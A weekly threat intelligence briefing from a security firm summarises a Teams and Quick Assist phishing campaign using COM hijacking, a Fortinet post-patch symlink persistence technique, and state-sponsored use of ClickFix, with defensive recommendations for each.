eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
Hijacked and Hidden: New Backdoor and Persistence Technique
Bottom Line: Details have emerged on a new Microsoft Teams-based phishing attack which results in threat actors gaining access to victim machines through the Quick Assist tool.
On April 11th, ReliaQuest released a report about a new Microsoft Teams phishing campaign that employs a previously unseen persistence method known as TypeLib COM hijacking, along with a new PowerShell backdoor to maintain persistence on the victim's machine. The attack specifically targeted finance and professional services sectors, using precisely timed phishing attempts against executive-level employees, particularly those with female-identifying names. The attackers leveraged Windows' Quick Assist tool for initial access and employed an innovative Component Object Model (COM) TypeLib hijacking technique for persistence, ultimately deploying a sophisticated PowerShell backdoor that used Telegram for Command-and-Control (C2) communications.
The infection chain begins with the adversary sending phishing messages to employees through Microsoft Teams. The attacker used a fraudulent Microsoft 365 tenant with the display name "Technical Support" to impersonate an IT staff member. After making contact, the attackers would convince the victims to launch the Windows’ built-in “Quick Assist” tool to gain remote access to the victim’s system. Using Quick Assist as their entry point, the attacker utilized an uncommon persistence technique known as TypeLib hijacking that involved manipulating the Windows Registry to redirect legitimate COM objects to malicious scripts hosted on external URLs.
After executing the scripts, malware hosted on a Google Drive URL is downloaded and executed whenever the hijacked COM object is accessed, whether by opening Internet Explorer or any application utilizing Internet Explorer components. Additionally, the malicious payload would be downloaded automatically on system restarts. A PowerShell Backdoor is deployed in the final stage which constructs a C2 beacon URL using the infected device’s hard drive serial number, creates a WebClient object to receive commands or second-stage malware and runs an infinite loop to download and execute these commands.
ReliaQuest has not provided details on how the backdoor was used following its deployment. Threat actors could employ backdoor access for a variety of purposes ranging from information theft to the deployment of other malware including ransomware.
eSentire Threat Intelligence Analysis:
The early stage of the attacks aligns with the techniques of Storm-1811, a threat group known to deploy Black Basta ransomware. However, the later stages of the attacks show a new method for maintaining persistence that deviates from typical practices. This change suggests that the group may be evolving its techniques or possibly splitting. Several interesting details in this report suggest that the attacks were designed to exploit specific gaps. For instance, the phishing attempts were carefully timed to occur between 2:00 p.m. and 3:00 p.m., a period when employees are often less alert to spotting malicious activity. Additionally, the attackers targeted executive-level employees, such as directors and vice presidents—individuals who possess valuable access. Moreover, the attackers exclusively targeted employees with female-sounding names. ReliaQuest suggests that they may have relied on research into trends in phishing susceptibility to maximize their success rate.
Two separate threat actor groups observed by Sophos used similar attack techniques, including email bombing and vishing attacks on Microsoft Teams, to access a host through legitimate software. This highlights the effectiveness of social-engineering attacks. With the introduction of TypeLib COM hijacking, a new technique designed for persistence, attackers ensure that they maintain a foothold in the victim's system, remaining active whenever the application is used, all while leveraging legitimate system functionality for stealth. The combination of these techniques in attacks indicates that adversaries are adopting a more strategic approach to compromising organizations.
To defend against such attacks, it is critical that users are trained to identify and report social engineering attempts. Additionally, organizations can prevent the abuse of Microsoft teams in this context, by blocking external Microsoft tenants, if not required for legitimate business purposes. Similarly, organizations should consider blocking all Remote Monitoring and Management (RMM) tools that are not used for legitimate purposes. Email spam filtering will help minimize the impact, decreasing the likelihood of successful social engineering via Microsoft Teams or malicious phone calls (vishing).
In response to the release of this report, the eSentire Threat Intelligence team is actively monitoring this topic and exploring new detection opportunities. For additional insights into how threat actors are gaining initial access and exploiting legitimate RMM tools, the eSentire Threat Intelligence team has released an advisory on email bombing and provided an in-depth analysis in the October eSentire TRU Intelligence Briefing webinar.
Fortinet Warns on Threat Activity Targeting Patched Vulnerabilities
Bottom Line: Attackers are exploiting known vulnerabilities in Fortinet devices to achieve persistent read-only access even after patches are applied, highlighting the need for organizations to adopt a comprehensive security strategy beyond just patch management.
On April 10th, Fortinet released an advisory warning about a new post-exploitation activity where attackers leveraged known vulnerabilities to maintain read-only access to the vulnerable Fortinet devices even after the flaws were patched.
In recent incidents observed by Fortinet, the threat actors leveraged previously known vulnerabilities including, but not limited to CVE-2024-21762 (CVSS: 9.8), CVE-2023-27997 (CVSS: 9.8), and CVE-2022- 42475 (CVSS: 9.8), in the Fortinet products. As per the cybersecurity news publication company Bleeping Computer, Fortinet initially notified its customers about the activity via email followed by the release of the warning. According to Fortinet's report, the attackers initially leveraged the mentioned vulnerabilities to infiltrate the victim organization's network. They then used a novel post-exploitation technique to maintain read-only access to the compromised Fortinet devices, even after the original vulnerability used for initial access had been addressed.
Upon successfully breaching the network, a symbolic link was created by connecting the user filesystem and the root filesystem within a directory used to serve language files for the SSL-VPN. This symbolic link enabled the threat actors to retain read-only access to files on the victim device’s file system, potentially including configuration files. Because this modification was located in the user filesystem, it went undetected and persisted even after the FortiOS version was updated to mitigate the vulnerability, keeping the symbolic link intact. Fortinet noted that the customers who have never enabled SSL-VPN are not impacted by the issue.
Fortinet outlined mitigation steps in their advisory, recommending that affected customers upgrade to the secure FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, or 6.4.16. They also advised conducting a thorough inspection of all configuration files and following the prescribed measures if a compromised host is detected. On April 11th, CISA issued a security advisory highlighting the new post-exploitation technique and recommended that organizations disable SSL-VPN until the necessary patches are applied and follow the mitigations provided by Fortinet.
The activity did not appear to target any particular geographic region or industry. However, on April 12th, watchTowr reported observing the post-exploitation activity across their client base, which included organizations in critical infrastructure sectors. No further details were revealed by watchTowr.
eSentire Threat Intelligence Analysis:
The post-exploitation activity reported by Fortinet underscores that organizations cannot solely rely only on patching the vulnerabilities, as attackers use stealth techniques like creating symbolic links to evade detection, that require a more comprehensive security approach. Although the attackers’ identities responsible for this activity remain unknown, their actions demonstrate a high level of sophistication and a deep understanding of Fortinet devices’ filesystem architecture. The attackers’ ability to devise a technique that allows continued access to the devices even after the vulnerabilities were patched suggests that the attackers are highly strategic and have significant experience in targeting network infrastructure.
While Fortinet did not disclose the exact timeline of the post-exploitation activity, the Computer Emergency Response Team of France (CERT-FR) released an alert indicating they have observed the technique being used to compromise multiple devices in France since early 2023. Fortinet vulnerabilities have been a favorable target for the attackers due to their widespread use and the availability of the potential vulnerable Internet-facing devices. A critical zero-day vulnerability, CVE-2024-55591, impacting multiple versions of FortiOS and FortiProxy was exploited in the wild in January 2025 to gain privileged access to the vulnerable Fortinet devices.
Organizations are recommended to deploy effective vulnerability assessment and patch management solutions to address known security flaws and minimize the risk of exploitation. It is strongly advised that FortiOS be updated to the latest secure versions without delay. To counter the threat posed by the newly identified post-exploitation technique highlighted in the Fortinet report, administrators should enforce stricter device hardening practices, including routine reviews of device configuration files. Additionally, following CISA’s guidance, SSL-VPN should be disabled on Fortinet devices until the necessary patches are fully applied.
eSentire has been consistently monitoring the vulnerabilities disclosed in Fortinet devices to develop opportunities for detecting exploitation. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify devices vulnerable to the mentioned flaws, and eSentire MDR for Network has rules in place to identify exploitation attempts involving CVE-2024-21762 and CVE-2023-27997. eSentire released a security advisory addressing CVE-2024-55591 on January 14th, 2025.
State-Sponsored Actors Try ClickFix
Bottom Line: Proofpoint researchers discovered that state-sponsored threat actors from North Korea, Iran, and Russia have adopted the "ClickFix" social engineering technique between October 2024 and January 2025.
On April 17th, 2025, Proofpoint released a report providing details on phishing campaigns, originating from state-sponsored APT groups from North Korea, Iran, and Russia. The phishing campaigns were observed from October 2024 to January 2025 and are notable as they all involved use of the ClickFix social engineering technique. The ClickFix technique involves users being presented with a fake CAPTCHA, prompting them to paste and execute an attacker-provided PowerShell command into the Windows Run box, or directly into PowerShell itself, which results in the deployment of malware.
In October and December of 2024, Proofpoint observed APT groups from Russia (UNK_RemoteRogue and TA422) sending phishing emails that made use of ClickFix. The emails sent by UNK_RemoteRogue targeted organizations within the Defense industry and resulted in the deployment of the PowerShell Empire Command-and-Control (C2) framework. The emails sent from TA422 contained ClickFix pages that were used to deploy SSH tunnels and Metasploit.
In November 2024, the Iranian APT group TA450 (aka MuddyWater and Mango Sandstorm) was observed sending phishing emails to organizations primarily within the Middle East, but some global targets, with the lure of fake Microsoft-related security updates. The emails provided instructions to apply the security patches, which was the ClickFix attack method, and execution of the malicious PowerShell commands resulted in the Level Remote Management and Monitoring (RMM) software being deployed.
In January 2025, the North Korean APT group TA427 sent out phishing emails targeting organizations in the think tank sector, attempting to build trust. Once rapport was established, the attackers would then send out emails that contained a URL, directing victims to the ClickFix attack. This campaign resulted in the deployment of the open-source Remote Access Trojan (RAT), QuasarRAT.
Proofpoint notes that after these campaigns were observed, all but the North Korean APT TA427 reportedly went back to their standard campaigns. TA427 was observed in April 2025 with a new campaign involving the ClickFix technique. Proofpoint assesses that the lack of additional campaigns from some of the APT groups suggest that the adoption of the ClickFix technique may have been a trial and the groups may be continuing to develop their campaigns, or the threat actors did not have as much success using ClickFix compared to the previous techniques used.
eSentire Threat Intelligence Analysis:
The campaigns highlighted by Proofpoint are not the only examples of state-sponsored APT groups using the ClickFix technique in their campaigns, with additional North Korean threat actors having recently been observed making use of this technique as well. ClickFix was observed being used in an extension of the Contagious Interview campaign (referred to as ClickFake) by the Lazarus Group for financially motivated attacks. ClickFix was also observed in use by the group Kimsuky (Emerald Street), first reported in February 2025, and used to deploy web browser-based remote desktop tools to gain access to victim machines and exfiltrate data.
The adoption of the ClickFix technique by state-sponsored APT groups within phishing campaigns replaces the infection and execution stages within previous attack chains but does not offer any major changes to existing campaigns. The cyber threat landscape is constantly evolving, with new and existing Tactics, Techniques, and Procedures (TTPs) emerging and developing. However, APT groups adopting TTPs first used in attacks by other threat actors is not a new trend. Examples of this include North Korean APT groups use of crypto miners to fund the North Korean regime, deployment of ransomware by APT groups to generate funds or cover their tracks, or the use of publicly available Proof-of Concept (PoC) exploit code to exploit known vulnerabilities.
With the adoption of effective TTPs used to perform attacks, state-sponsored APT activity can blend in with any other threat activity observed in the wild. Organizations should ensure that effective cyber security strategies are implemented to defend against these types of attacks. Recommendations include disabling the Windows Run box via Group Policy Object (GPO) to prevent users from being able to execute ClickFix attacks and implementing Phishing and Security Awareness Training (PSAT) programs to train users how to identify and report malicious content.
eSentire's Threat Intelligence team has observed a large spike in the ClickFix initial access method being used to deploy various information stealers and RATs over the past year. eSentire MDR for Network and MDR for Endpoint have detections in place to monitor for ClickFix-related traffic and post-exploitation activity. eSentire's Threat Response Unit (TRU) has published a blog and two advisories on ClickFix being used to deliver MintsLoader, Lumma Stealer, and NetSupportRAT, as well as being covered as a topic in the February 2025 TRU Intelligence Briefing. Given the adoption of the ClickFix technique by various threat actors, its use and adoption by additional threat actor groups will likely continue into the future.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
